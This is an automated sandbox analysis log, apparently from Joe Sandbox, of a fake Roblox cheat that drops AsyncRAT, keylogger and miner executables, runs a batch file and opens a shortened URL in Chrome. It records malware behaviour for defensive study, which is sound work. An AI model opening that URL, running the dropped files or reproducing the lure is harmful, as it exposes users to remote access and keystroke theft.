            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49750 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49751 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.6:49753 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49754 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:58795 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:58797 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Contains functionality to log keystrokes (.Net Source)
            Source: BitCoin_miner.exe.0.dr, XLogger.cs.Net Code: KeyboardLayout
            Source: msedge.exe.0.dr, XLogger.cs.Net Code: KeyboardLayout

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 00000000.00000003.2110891965.000001CD51F82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\ msedge.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E5C2F0: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF693E5C2F0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_666048289Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_666048289\sets.jsonJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_666048289\manifest.jsonJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_666048289\LICENSEJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_666048289\_metadata\Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_666048289\_metadata\verified_contents.jsonJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_666048289\manifest.fingerprintJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_1851964843Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_1851964843\Google.Widevine.CDM.dllJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_1851964843\manifest.jsonJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_1851964843\_metadata\Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_1851964843\_metadata\verified_contents.jsonJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_1851964843\manifest.fingerprintJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_1926064875Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_1926064875\cr_en-us_500000_index.binJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_1926064875\manifest.jsonJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_1926064875\_metadata\Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_1926064875\_metadata\verified_contents.jsonJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_1926064875\manifest.fingerprintJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\chrome_BITS_6712_1318469463Jump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E6A4AC0_2_00007FF693E6A4AC
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E734840_2_00007FF693E73484
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E7B1900_2_00007FF693E7B190
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E649280_2_00007FF693E64928
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E5F9300_2_00007FF693E5F930
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E807540_2_00007FF693E80754
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E71F200_2_00007FF693E71F20
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E7CE880_2_00007FF693E7CE88
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E55E240_2_00007FF693E55E24
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E6B5340_2_00007FF693E6B534
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E753F00_2_00007FF693E753F0
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E5A3100_2_00007FF693E5A310
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E5C2F00_2_00007FF693E5C2F0
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E572880_2_00007FF693E57288
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E6126C0_2_00007FF693E6126C
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E721D00_2_00007FF693E721D0
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E6F1800_2_00007FF693E6F180
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E8C8380_2_00007FF693E8C838
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E548400_2_00007FF693E54840
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E576C00_2_00007FF693E576C0
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E925500_2_00007FF693E92550
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E88C1C0_2_00007FF693E88C1C
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E74B980_2_00007FF693E74B98
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E6BB900_2_00007FF693E6BB90
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E65B600_2_00007FF693E65B60
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E95AF80_2_00007FF693E95AF8
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E72AB00_2_00007FF693E72AB0
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E51AA40_2_00007FF693E51AA4
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E8FA940_2_00007FF693E8FA94
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E61A480_2_00007FF693E61A48
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E889A00_2_00007FF693E889A0
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E6C96C0_2_00007FF693E6C96C
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E739640_2_00007FF693E73964
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E920800_2_00007FF693E92080
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E6AF180_2_00007FF693E6AF18
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E807540_2_00007FF693E80754
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E78DF40_2_00007FF693E78DF4
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E72D580_2_00007FF693E72D58
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\ msedge.exe E85AF6A36635490B2FC2793B50C7EBC841DA95BC202A5FC9E7A4DBB17F172A2B
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe 79750B0F34A49A75406A0D7D6949AFD83DF2B2FF946E35A94AEA6BFE1D399599
            Source: Google.Widevine.CDM.dll.8.drStatic PE information: Number of sections : 12 > 10
            Source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56711000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRoblox.exeH vs cheat_roblox.exe
            Source: cheat_roblox.exe, 00000000.00000003.2110891965.000001CD51F82000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs cheat_roblox.exe
            Source: cheat_roblox.exe, 00000000.00000003.2110891965.000001CD51F82000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameX.exe4 vs cheat_roblox.exe
            Source: 00000000.00000003.2110891965.000001CD51F82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\user\AppData\Local\Temp\ msedge.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: BitCoin_miner.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: BitCoin_miner.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: BitCoin_miner.exe.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: Keyloger.exe.0.dr, tMXwX3tWlMuOZgJ.csCryptographic APIs: 'TransformFinalBlock'
            Source: Keyloger.exe.0.dr, dtVFTVK0Ux3SN1R.csCryptographic APIs: 'TransformFinalBlock'
            Source: Keyloger.exe.0.dr, dtVFTVK0Ux3SN1R.csCryptographic APIs: 'TransformFinalBlock'
            Source: msedge.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: msedge.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: msedge.exe.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: msedge.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: msedge.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: Keyloger.exe.0.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: Keyloger.exe.0.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: BitCoin_miner.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: BitCoin_miner.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: msedge.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: msedge.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: Keyloger.exe.0.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: Keyloger.exe.0.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: BitCoin_miner.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: BitCoin_miner.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: msedge.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: msedge.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: Keyloger.exe.0.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: Keyloger.exe.0.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: BitCoin_miner.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: BitCoin_miner.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: msedge.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: msedge.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: Keyloger.exe.0.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: Keyloger.exe.0.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: BitCoin_miner.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: BitCoin_miner.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal52.troj.spyw.evad.winEXE@33/28@20/13
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E5B6D8 GetLastError,FormatMessageW,LocalFree,0_2_00007FF693E5B6D8
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E78624 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00007FF693E78624
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeFile created: C:\Program Files (x86)\RobloxJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeFile created: C:\Users\user\AppData\Local\RobloxJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4000:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:120:WilError_03
            Source: C:\Users\user\Desktop\cheat_roblox.exeFile created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_5872578Jump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\coin.bat" "
            Source: cheat_roblox.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\cheat_roblox.exeFile read: C:\Windows\win.iniJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: cheat_roblox.exeReversingLabs: Detection: 59%
            Source: C:\Users\user\Desktop\cheat_roblox.exeFile read: C:\Users\user\Desktop\cheat_roblox.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\cheat_roblox.exe "C:\Users\user\Desktop\cheat_roblox.exe"
            Source: C:\Users\user\Desktop\cheat_roblox.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\coin.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\cheat_roblox.exeProcess created: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe "C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/24RXx6
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1688 --field-trial-handle=1980,i,3286908272416009532,3896627819344561856,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Users\user\Desktop\cheat_roblox.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\coin.bat" "Jump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeProcess created: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe "C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmdJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/24RXx6Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1688 --field-trial-handle=1980,i,3286908272416009532,3896627819344561856,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: dxgidebug.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: ndfapi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wdi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: duser.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: atlthunk.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: ndfapi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wdi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: ndfapi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wdi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
